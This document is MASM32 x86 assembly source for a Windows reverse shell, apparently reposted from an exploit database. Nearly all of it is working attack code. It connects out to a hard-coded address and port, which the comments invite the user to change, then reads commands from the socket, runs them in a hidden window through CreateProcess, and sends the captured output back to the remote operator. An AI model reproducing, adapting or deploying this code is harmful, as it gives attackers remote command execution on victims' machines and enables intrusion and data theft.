###########################

# Win32 x86 Reverse Shell Vulnerability

###########################

.586
.model flat,stdcall
option casemap:none
 
include /masm32/include/windows.inc
include /masm32/include/masm32.inc
include /masm32/include/gdi32.inc
include /masm32/include/user32.inc
include /masm32/include/kernel32.inc
include /masm32/include/wsock32.inc

includelib /masm32/lib/masm32.lib
includelib /masm32/lib/gdi32.lib
includelib /masm32/lib/user32.lib
includelib /masm32/lib/kernel32.lib
includelib /masm32/lib/masm32.lib
includelib /masm32/lib/wsock32.lib

.const
MEMSIZE equ 65535

.data
AppName     db "Reverse Shell | Andrea Sindoni @invictus1306",0

err0        db "An error occured while calling WSAStartup",0
err1        db "An error occured while creating a socket",0
err2        db "An error occured while connecting",0
err3        db "An error occured while calling gethostbyname",0
err4        db "An error occured while calling connect/recv",0
err5        db "An error occured while calling CreatePipe",0
err6        db "An error occured while calling GlobalAlloc/Free-GlobalLock/Unlock",0
err7        db "An error occured while calling CreateProcess",0
capt        db "Information",0
hostname    db "192.168.1.86",0 ; change it with your address
port        dd 4444 ; change port number

recbuf byte 1001 dup (0)
 
.data?

sock            dd ?
ErrorCode       dd ?
pipe_read       dd ?
pipe_write      dd ?
size_to_send    dd ?
bwr             dd ?
stored_buffer   dd ?
wsadata WSADATA <>
sin sockaddr_in <?>
security_attrib SECURITY_ATTRIBUTES <>
stinfo STARTUPINFO <>
pinfo PROCESS_INFORMATION <>
buffer db 1024 dup(?)
hMemory HANDLE ?

 
.code

show_error proc caption:ptr byte, err_txt:ptr byte
    invoke WSAGetLastError
    mov ErrorCode, eax
    invoke MessageBoxA, MB_OK, err_txt, caption, 0
    ret
show_error endp

show_error_1 proc caption:ptr byte, err_txt:ptr byte
    invoke GetLastError
    mov ErrorCode, eax
    invoke MessageBoxA, MB_OK, err_txt, caption, 0
    ret
show_error_1 endp

main proc

    invoke WSAStartup, 101h, addr wsadata
    cmp eax, 0
    jnz @error_wsa_startup
    invoke socket ,AF_INET, SOCK_STREAM, 0 ; Create a stream socket
    cmp eax, INVALID_SOCKET
    je @error_socket_creation
    mov sock, eax
    mov sin.sin_family, AF_INET
    invoke htons, port 
    mov sin.sin_port, ax
    invoke gethostbyname, addr hostname
    cmp eax, 0
    je @error_gethostbyname
    mov eax, [eax+12]   
    mov eax, [eax]      
    mov eax, [eax] ; copy ip address
    mov sin.sin_addr,eax
    invoke connect, sock, addr sin, sizeof sin
    cmp eax, SOCKET_ERROR
    je @error_socket_error

    @@receive_data_loop:
    invoke RtlZeroMemory, ADDR recbuf, sizeof recbuf
    invoke recv, sock, addr recbuf, 1000, NULL
    cmp eax, SOCKET_ERROR
    je @error_socket_error
   
    mov security_attrib.lpSecurityDescriptor,0
    mov security_attrib.bInheritHandle, TRUE
    mov security_attrib.nLength, sizeof SECURITY_ATTRIBUTES

    invoke CreatePipe, offset pipe_read, offset pipe_write, offset security_attrib, 0
    cmp eax, 0
    jz @error_creation_pipe
   
    mov stinfo.cb,sizeof STARTUPINFO
    mov eax, pipe_write
    mov stinfo.hStdOutput, eax
    mov stinfo.hStdError, eax
    mov stinfo.dwFlags, STARTF_USESHOWWINDOW+ STARTF_USESTDHANDLES
    mov stinfo.wShowWindow, SW_HIDE
   
    invoke CreateProcess, 0, ADDR recbuf, 0, 0, TRUE, 0, 0, 0, offset stinfo, offset pinfo
    or eax,eax
    invoke CloseHandle, pipe_write
    jz @error_create_process
   
    invoke RtlZeroMemory, ADDR buffer, sizeof buffer
   
    invoke GlobalAlloc, GMEM_MOVEABLE or GMEM_ZEROINIT, MEMSIZE
    cmp eax, 0
    je @error_global_alloc
   
    mov hMemory, eax
    invoke GlobalLock, hMemory
    cmp eax, 0
    je @error_global_lock
   
    ;mov stored_buffer, dword ptr [eax]
    mov stored_buffer, eax
    mov edi, [stored_buffer]
    xor ecx, ecx
    mov size_to_send, 0
   
    loop_:
        invoke ReadFile, pipe_read, offset buffer, 1024, offset bwr, 0
        add size_to_send, 1
        cmp eax, 0
        jz _found
       
        invoke lstrcat, edi, addr buffer ; append current buffer content to edi
        invoke RtlZeroMemory, addr buffer, sizeof buffer
    jmp loop_
       
    _found:
    xor eax, eax
    xor ecx, ecx
    mov ecx, 1024
    mov al, byte ptr [size_to_send]
    mul ecx ; I take a size that is multiple of 1024
    mov size_to_send, eax

    invoke send, sock, edi, size_to_send, 0
    cmp eax, SOCKET_ERROR
    je @error_connection
   
    invoke GlobalUnlock, hMemory
    cmp eax, 0
    jnz @error_global_lock
    invoke GlobalFree, hMemory
    cmp eax, 0
    jnz @error_global_alloc   
   
    ;invoke Sleep, 1000

    jmp @@receive_data_loop
   
    exit:
    invoke closesocket, sock
    cmp eax, INVALID_SOCKET
    je @error_socket_creation
    invoke WSACleanup
    invoke ExitProcess,0
   
    @error_wsa_startup:
    invoke show_error, offset capt, offset err0
    jmp exit
   
    @error_socket_creation:
    invoke show_error, offset capt, offset err1
    jmp exit
   
    @error_connection:
    invoke show_error, offset capt, offset err2
    jmp exit

    @error_gethostbyname:
    invoke show_error, offset capt, offset err3
    jmp exit
   
    @error_socket_error:
    invoke show_error, offset capt, offset err4
    jmp exit
   
    @error_creation_pipe:
    invoke show_error, offset capt, offset err5
    jmp exit
   
    @error_create_process:
    invoke show_error_1, offset capt, offset err7
    jmp exit
   
    @error_global_alloc:
    invoke show_error_1, offset capt, offset err6
    jmp exit
   
    @error_global_lock:
    invoke show_error_1, offset capt, offset err6
    jmp exit

main endp

end main

end start

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-03-08]

###########################